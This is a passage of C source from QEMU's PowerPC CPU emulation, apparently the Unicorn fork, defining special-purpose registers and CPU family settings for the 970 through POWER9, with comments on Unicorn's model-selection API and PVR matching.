*ctx, int sprn, int gprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_write_generic(ctx, sprn, gprn); } static void spr_read_tm_upper32(DisasContext *ctx, int gprn, int sprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_read_prev_upper32(ctx, gprn, sprn); } static void spr_write_tm_upper32(DisasContext *ctx, int sprn, int gprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_write_prev_upper32(ctx, sprn, gprn); } static void gen_spr_power8_tm(CPUPPCState *env) { spr_register_kvm(env, SPR_TFHAR, "TFHAR", &spr_read_tm, &spr_write_tm, &spr_read_tm, &spr_write_tm, KVM_REG_PPC_TFHAR, 0x00000000); spr_register_kvm(env, SPR_TFIAR, "TFIAR", &spr_read_tm, &spr_write_tm, &spr_read_tm, &spr_write_tm, KVM_REG_PPC_TFIAR, 0x00000000); spr_register_kvm(env, SPR_TEXASR, "TEXASR", &spr_read_tm, &spr_write_tm, &spr_read_tm, &spr_write_tm, KVM_REG_PPC_TEXASR, 0x00000000); spr_register(env, SPR_TEXASRU, "TEXASRU", &spr_read_tm_upper32, &spr_write_tm_upper32, &spr_read_tm_upper32, &spr_write_tm_upper32, 0x00000000); } static void spr_read_ebb(DisasContext *ctx, int gprn, int sprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_read_generic(ctx, gprn, sprn); } static void spr_write_ebb(DisasContext *ctx, int sprn, int gprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_write_generic(ctx, sprn, gprn); } static void spr_read_ebb_upper32(DisasContext *ctx, int gprn, int sprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_read_prev_upper32(ctx, gprn, sprn); } static void spr_write_ebb_upper32(DisasContext *ctx, int sprn, int gprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_write_prev_upper32(ctx, sprn, gprn); } static void gen_spr_power8_ebb(CPUPPCState *env) { spr_register(env, SPR_BESCRS, "BESCRS", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BESCRSU, "BESCRSU", &spr_read_ebb_upper32, &spr_write_ebb_upper32, &spr_read_prev_upper32, &spr_write_prev_upper32, 0x00000000); spr_register(env, SPR_BESCRR, "BESCRR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BESCRRU, "BESCRRU", &spr_read_ebb_upper32, &spr_write_ebb_upper32, &spr_read_prev_upper32, &spr_write_prev_upper32, 0x00000000); spr_register_kvm(env, SPR_EBBHR, "EBBHR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_EBBHR, 0x00000000); spr_register_kvm(env, SPR_EBBRR, "EBBRR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, 
&spr_write_generic, KVM_REG_PPC_EBBRR, 0x00000000); spr_register_kvm(env, SPR_BESCR, "BESCR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_BESCR, 0x00000000); } /* Virtual Time Base */ static void gen_spr_vtb(CPUPPCState *env) { spr_register_kvm_hv(env, SPR_VTB, "VTB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_vtb, SPR_NOACCESS, &spr_read_vtb, &spr_write_vtb, KVM_REG_PPC_VTB, 0x00000000); } static void gen_spr_power8_fscr(CPUPPCState *env) { target_ulong initval = 0; spr_register_kvm(env, SPR_FSCR, "FSCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_FSCR, initval); } static void gen_spr_power8_pspb(CPUPPCState *env) { spr_register_kvm(env, SPR_PSPB, "PSPB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic32, KVM_REG_PPC_PSPB, 0); } static void gen_spr_power8_dpdes(CPUPPCState *env) { /* Directed Privileged Door-bell Exception State, used for IPI */ spr_register_kvm_hv(env, SPR_DPDES, "DPDES", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dpdes, SPR_NOACCESS, &spr_read_dpdes, &spr_write_dpdes, KVM_REG_PPC_DPDES, 0x00000000); } static void gen_spr_power8_ic(CPUPPCState *env) { spr_register_hv(env, SPR_IC, "IC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0); } static void gen_spr_power8_book4(CPUPPCState *env) { /* Add a number of P8 book4 registers */ spr_register_kvm(env, SPR_ACOP, "ACOP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_ACOP, 0); spr_register_kvm(env, SPR_BOOKS_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pidr, KVM_REG_PPC_PID, 0); spr_register_kvm(env, SPR_WORT, "WORT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_WORT, 0); } static void gen_spr_power7_book4(CPUPPCState *env) { /* Add a number of P7 book4 registers */ spr_register_kvm(env, SPR_ACOP, "ACOP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_ACOP, 0); spr_register_kvm(env, SPR_BOOKS_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PID, 0); } static void gen_spr_power8_rpr(CPUPPCState *env) { spr_register_hv(env, SPR_RPR, "RPR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000103070F1F3F); } static void gen_spr_power9_mmu(CPUPPCState *env) { /* Partition Table Control */ spr_register_kvm_hv(env, SPR_PTCR, "PTCR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_ptcr, KVM_REG_PPC_PTCR, 0x00000000); /* Address Segment Descriptor Register */ spr_register_hv(env, SPR_ASDR, "ASDR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x0000000000000000); } static void init_proc_book3s_common(CPUPPCState *env) { gen_spr_ne_601(env); gen_tbl(env); gen_spr_usprg3(env); gen_spr_book3s_altivec(env); gen_spr_book3s_pmu_sup(env); gen_spr_book3s_pmu_user(env); gen_spr_book3s_ctrl(env); } static void init_proc_970(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_dbg(env); /* 970 Specific Registers */ gen_spr_970_hid(env); gen_spr_970_hior(env); gen_low_BATs(env); gen_spr_970_pmu_sup(env); gen_spr_970_pmu_user(env); gen_spr_970_lpar(env); gen_spr_970_dbg(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_970(env); ppc970_irq_init(env_archcpu(env)); } 
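/*
 * Editor's note: in the Unicorn build, these POWERPC_FAMILY()
 * initializers are what a cpu-model request through uc_ctl ultimately
 * selects.  A minimal host-side sketch (not part of this file's
 * build; the exact UC_CPU_PPC64_* enumerator name is an assumption --
 * check include/unicorn/ppc.h for the models actually exported):
 *
 *   #include <unicorn/unicorn.h>
 *
 *   int run_on_ppc64(const uint8_t *code, size_t size)
 *   {
 *       uc_engine *uc;
 *       if (uc_open(UC_ARCH_PPC, UC_MODE_PPC64 | UC_MODE_BIG_ENDIAN,
 *                   &uc) != UC_ERR_OK) {
 *           return -1;
 *       }
 *       // assumed model name; any UC_CPU_PPC64_* value is selected
 *       // the same way
 *       uc_ctl_set_cpu_model(uc, UC_CPU_PPC64_970_V2_2);
 *       uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL);
 *       uc_mem_write(uc, 0x1000, code, size);
 *       uc_emu_start(uc, 0x1000, 0x1000 + size, 0, 0);
 *       uc_close(uc);
 *       return 0;
 *   }
 */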
POWERPC_FAMILY(970)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 970"; pcc->init_proc = init_proc_970; pcc->check_pow = check_pow_970; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI; pcc->insns_flags2 = PPC2_FP_CVT_S64; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI); pcc->mmu_model = POWERPC_MMU_64B; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_basic; pcc->excp_model = POWERPC_EXCP_970; pcc->bus_model = PPC_FLAGS_INPUT_970; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x10000; } static void init_proc_power5plus(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_dbg(env); /* POWER5+ Specific Registers */ gen_spr_970_hid(env); gen_spr_970_hior(env); gen_low_BATs(env); gen_spr_970_pmu_sup(env); gen_spr_970_pmu_user(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power5p_tb(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_970(env); ppc970_irq_init(env_archcpu(env)); } POWERPC_FAMILY(POWER5P)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER5"; // dc->desc = "POWER5+"; pcc->init_proc = init_proc_power5plus; pcc->check_pow = check_pow_970; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_SEGMENT_64B | PPC_SLBI; pcc->insns_flags2 = PPC2_FP_CVT_S64; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI); pcc->lpcr_mask = LPCR_RMLS | LPCR_ILE | LPCR_LPES0 | LPCR_LPES1 | LPCR_RMI | LPCR_HDICE; pcc->mmu_model = POWERPC_MMU_2_03; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_basic; pcc->lrg_decr_bits = 32; pcc->excp_model = POWERPC_EXCP_970; pcc->bus_model = PPC_FLAGS_INPUT_970; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x10000; } static void init_proc_POWER7(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_dbg(env); /* POWER7 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_rmor(env); gen_spr_amr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); 
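/*
 * Editor's note on the ppc_pvr_match_* helpers defined below: server
 * CPUs are identified by the upper half of the Processor Version
 * Register only, so the revision field is masked off before the
 * compare.  Worked example (mask value per QEMU's cpu-models header,
 * CPU_POWERPC_POWER_SERVER_MASK == 0xffff0000; treat the constants as
 * assumptions if this tree differs):
 *
 *   uint32_t pvr  = 0x003f0201;              // a POWER7 v2.1 part
 *   uint32_t base = pvr & 0xffff0000;        // -> 0x003f0000
 *   bool matched  = (base == CPU_POWERPC_POWER7_BASE);   // true
 */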
gen_spr_power5p_tb(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power7_book4(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER7(env); ppcPOWER7_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power7(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER7P_BASE) { return true; } if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER7_BASE) { return true; } return false; } static bool cpu_has_work_POWER7(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE0)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE1)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE2)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE2)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER7)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER7"; // dc->desc = "POWER7"; pcc->pvr_match = ppc_pvr_match_power7; pcc->pcr_mask = PCR_VEC_DIS | PCR_VSX_DIS | PCR_COMPAT_2_05; pcc->pcr_supported = PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER7; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER7; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_DFP | PPC2_DBRX | PPC2_ISA205 | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_FP_CVT_S64 | PPC2_PM_ISA206; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM0 | LPCR_VPM1 | LPCR_ISL | LPCR_DPFD | LPCR_VRMASD | LPCR_RMLS | LPCR_ILE | LPCR_P7_PECE0 | LPCR_P7_PECE1 | LPCR_P7_PECE2 | LPCR_MER | LPCR_TC | LPCR_LPES0 | LPCR_LPES1 | LPCR_HDICE; pcc->lpcr_pm = LPCR_P7_PECE0 | LPCR_P7_PECE1 | LPCR_P7_PECE2; pcc->mmu_model = POWERPC_MMU_2_06; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->lrg_decr_bits = 32; pcc->excp_model = POWERPC_EXCP_POWER7; pcc->bus_model = PPC_FLAGS_INPUT_POWER7; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = 
ppc_cpu_interrupts_big_endian_lpcr; } static void init_proc_POWER8(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_207_dbg(env); /* POWER8 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_rmor(env); gen_spr_amr(env); gen_spr_iamr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power5p_tb(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power8_tce_address_control(env); gen_spr_power8_ids(env); gen_spr_power8_ebb(env); gen_spr_power8_fscr(env); gen_spr_power8_pmu_sup(env); gen_spr_power8_pmu_user(env); gen_spr_power8_tm(env); gen_spr_power8_pspb(env); gen_spr_power8_dpdes(env); gen_spr_vtb(env); gen_spr_power8_ic(env); gen_spr_power8_book4(env); gen_spr_power8_rpr(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER8(env); ppcPOWER7_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power8(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER8NVL_BASE) { return true; } if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER8E_BASE) { return true; } if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER8_BASE) { return true; } return false; } static bool cpu_has_work_POWER8(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE2)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE3)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE4)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE4)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DOORBELL)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE0)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HDOORBELL)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE1)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER8)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER8"; // dc->desc = "POWER8"; pcc->pvr_match = ppc_pvr_match_power8; pcc->pcr_mask = PCR_TM_DIS | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->pcr_supported = PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER8; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER8; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | 
PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM | PPC2_PM_ISA206; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_HV) | (1ull << MSR_TM) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_TS0) | (1ull << MSR_TS1) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM0 | LPCR_VPM1 | LPCR_ISL | LPCR_KBV | LPCR_DPFD | LPCR_VRMASD | LPCR_RMLS | LPCR_ILE | LPCR_AIL | LPCR_ONL | LPCR_P8_PECE0 | LPCR_P8_PECE1 | LPCR_P8_PECE2 | LPCR_P8_PECE3 | LPCR_P8_PECE4 | LPCR_MER | LPCR_TC | LPCR_LPES0 | LPCR_HDICE; pcc->lpcr_pm = LPCR_P8_PECE0 | LPCR_P8_PECE1 | LPCR_P8_PECE2 | LPCR_P8_PECE3 | LPCR_P8_PECE4; pcc->mmu_model = POWERPC_MMU_2_07; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->lrg_decr_bits = 32; pcc->n_host_threads = 8; pcc->excp_model = POWERPC_EXCP_POWER8; pcc->bus_model = PPC_FLAGS_INPUT_POWER7; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX | POWERPC_FLAG_TM; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_lpcr; } /* * Radix pg sizes and AP encodings for dt node ibm,processor-radix-AP-encodings * Encoded as array of int_32s in the form: * 0bxxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyy * x -> AP encoding * y -> radix mode supported page size (encoded as a shift) */ static struct ppc_radix_page_info POWER9_radix_page_info = { .count = 4, .entries = { 0x0000000c, /* 4K - enc: 0x0 */ 0xa0000010, /* 64K - enc: 0x5 */ 0x20000015, /* 2M - enc: 0x1 */ 0x4000001e /* 1G - enc: 0x2 */ } }; static void init_proc_POWER9(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_book3s_207_dbg(env); /* POWER8 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_amr(env); gen_spr_iamr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power5p_tb(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power8_tce_address_control(env); gen_spr_power8_ids(env); gen_spr_power8_ebb(env); gen_spr_power8_fscr(env); gen_spr_power8_pmu_sup(env); gen_spr_power8_pmu_user(env); gen_spr_power8_tm(env); gen_spr_power8_pspb(env); gen_spr_power8_dpdes(env); gen_spr_vtb(env); gen_spr_power8_ic(env); gen_spr_power8_book4(env); gen_spr_power8_rpr(env); gen_spr_power9_mmu(env); /* POWER9 Specific registers */ spr_register_kvm(env, SPR_TIDR, "TIDR", NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_TIDR, 0); /* FIXME: Filter fields properly based on privilege level */ spr_register_kvm_hv(env, SPR_PSSCR, "PSSCR", NULL, NULL, NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_PSSCR, 0); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER9(env); ppcPOWER9_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power9(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER9_BASE) { return true; } return false; } static bool cpu_has_work_POWER9(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { uint64_t psscr = env->spr[SPR_PSSCR]; if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) 
{ return false; } /* If EC is clear, just return true on any pending interrupt */ if (!(psscr & PSSCR_EC)) { return true; } /* External Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_EEE)) { bool heic = !!(env->spr[SPR_LPCR] & LPCR_HEIC); if (heic == 0 || !msr_hv || msr_pr) { return true; } } /* Decrementer Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_DEE)) { return true; } /* Machine Check or Hypervisor Maintenance Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK | 1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_OEE)) { return true; } /* Privileged Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DOORBELL)) && (env->spr[SPR_LPCR] & LPCR_PDEE)) { return true; } /* Hypervisor Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HDOORBELL)) && (env->spr[SPR_LPCR] & LPCR_HDEE)) { return true; } /* Hypervisor virtualization exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HVIRT)) && (env->spr[SPR_LPCR] & LPCR_HVEE)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER9)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER9"; // dc->desc = "POWER9"; pcc->pvr_match = ppc_pvr_match_power9; pcc->pcr_mask = PCR_COMPAT_2_05 | PCR_COMPAT_2_06 | PCR_COMPAT_2_07; pcc->pcr_supported = PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER9; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER9; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | 